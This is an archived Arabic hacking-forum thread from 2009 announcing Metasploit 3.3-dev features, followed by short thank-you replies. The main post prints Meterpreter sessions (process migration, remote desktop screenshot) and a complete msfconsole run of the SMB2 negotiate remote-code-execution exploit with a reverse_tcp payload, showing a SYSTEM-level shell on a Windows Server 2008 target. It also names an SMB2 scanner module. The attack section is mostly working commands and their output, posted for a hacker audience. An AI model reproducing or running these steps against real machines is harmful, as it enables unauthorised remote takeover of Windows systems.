المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : التطورات والمميزات الجديدة في الميتاسبلويت 3.3-dev



BLACK.JaGuAr
12-19-2009, 07:26 PM
http://www.samysoft.net/forumim/basmla/68565.gif
http://www.samysoft.net/forumim/slam/6867867.gif


تحية لكم ياأعضاء منتديات جيوش الهكر ، اليوم حبيت اعرضلكم بعض التطورات في مشروع الميتاسبلويت ، فبعد اجراء العديد من التطويرات على مشروع ميتا سبلويت منذ الاصدار 3.2 أعلن H.D Moore المطوّر الرئيسي لمشروع الثغرات ميتا سبلويت بتدوينة كتبها بتاريخ البارحة عن بعض الميزات والثغرات الجديدة التي تم تطويرها بالاضافة لتوفير الاصدار 3.3-dev من ميتا سبلويت بشكل حزمة مضغوطة ليتم تحميلها من موقع المشروع.


يعتبر ميتا سبلويت هو مشروع الثغرات الأول في عالم الهاكرز حيث يحتوي ميتا سبلويت على العديد من الثغرات الجهازة للاستغلال عن بعد والتي يتم تحديثها بشكل مستمر بالاضافة للعديد من الأدوات المساعدة التي يستخدمها الهاكرز والـ Penetration Testers في عملهم لتساعدهم على اختبار أمن الشبكة وحماية الأجهزة الموجودة فيها من الثغرات.

من الأمور التي تم الانتهاء من تطويرها هي اضافة امكانية أخذ صورة لسطح مكتب الجهاز الذي تم اختراقه عن طريق استغلال Meterpreter وذلك كما وضّح HDM:


meterpreter > ps

Process list
============
PID Name Path
--- ---- ----
204 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
[ snipped ]
1736 Explorer.EXE C:\WINDOWS\Explorer.EXE
3348 sol.exe C:\WINDOWS\system32\sol.exe

meterpreter > migrate 1736
Migrating to 1736...
Migration completed successfully.

meterpreter > screenshot /tmp/boom.bmp
Image saved to /tmp/boom.bmp
Opening browser to image.


http://www.aljyyosh.info/upfiles/ywx42380.jpg


اما الأمر الثاني والذي أجده مهم جداً هو توفير استغلال للثغرة التي اكتشفت مسبقاً وأصابت خدمة مشاركة الملفات في نظام ويندوز فيستا و ويندوز سيرفر 2008 وحتى ويندوز 7.

عندما كتب ذلك الخبر كان الاستغلال عبارة عن Denial of Service فقط مع وجود احتمال لامكانية تطوير الاستغلال ليصبح Remote Code Execution, يبدو أن مطوري مشروع ****sploit والمساهمين فيه تمكّنوا من تحقيق ذلك وأصبحنا قادرين على استغلال الثغرة السابقة لاختراق الأجهزة التي تعمل بنظام ويندوز VISTA SP1 و VISTA SP2 وحتى Windows Server 2008 عن بعد!!


msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit

Started reverse handler
Connecting to the target (192.168.0.211:445)...
Sending the exploit packet (854 bytes)...
Waiting up to 180 seconds for exploit to trigger...
Sending stage (719360 bytes)
Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)

meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
********: en_US

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


يمكننا استخدام الأداة الجديدة التي تم اضافتها للمشروع لفحص الأنظمة التي تستخدم خدمة SMB2 لمشاركة الملفات (الاصدار المستخدم في ويندوز فيستا و ويندوز سيرفر 2008) والتي سنجدها بالمسار التالي:


auxiliary/scanner/smb/smb2


طبعا هذه ليست الميزات الوحيدة التي تم تطويرها واضافتها للمشروع منذ الاصدار 3.2 فيوجد الكثير من الثغرات, الأدوات والميزات الأخرى تم اضافتها للمشروع خلال تطويره في الفترة السابقة. المشروع مازال قيد التطوير ويحتاج مزيد من الوقت حتى يتم اطلاق الاصدار 3.3 بشكل نهائي لكن من الممكن متابعة مجريات تطوير المشروع أو استخدام أداة SVN لتحديثه ومزامنته بشكل مستمر.


ودمتم سالمين

ASDELY-ScOrPiOn
12-19-2009, 07:35 PM
بصراحة لا أستطيع التعليق على مدى إعجابي بمواضيعك وأسلوبك.
شرح واضح وكافي ومرفق بالصور والاهم من ذلك أنها حصرية على منتدانا فقط
يعني بصراحة... كل الإحترام
واصل وتقبل تحياتي

mohm4z
12-21-2009, 05:28 AM
أنت زي الفل والله يبني ربنا يحميك

صايد القلوب
01-04-2010, 10:09 PM
مشكوووووووووووووووووووووو ررررررررر

213nino16
01-05-2010, 04:58 AM
جزاك الله خيرا

LO--RD
04-13-2010, 03:13 PM
يعطيك العافيه ...

abdo el7dad
01-12-2011, 03:10 AM
السلام عليكم
الف شكر وبارك الله فيك

nor15din
01-16-2011, 11:59 PM
merciiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii

هكر الديوانيه
03-16-2012, 08:43 PM
مشكور ع الجهد البذول منك يا اخي الكريم

سارة الغامدي
10-01-2012, 03:34 PM
يسلمؤؤؤؤؤ ..

sarahassan
10-02-2012, 10:38 PM
رووووووووووووووووووعة خيو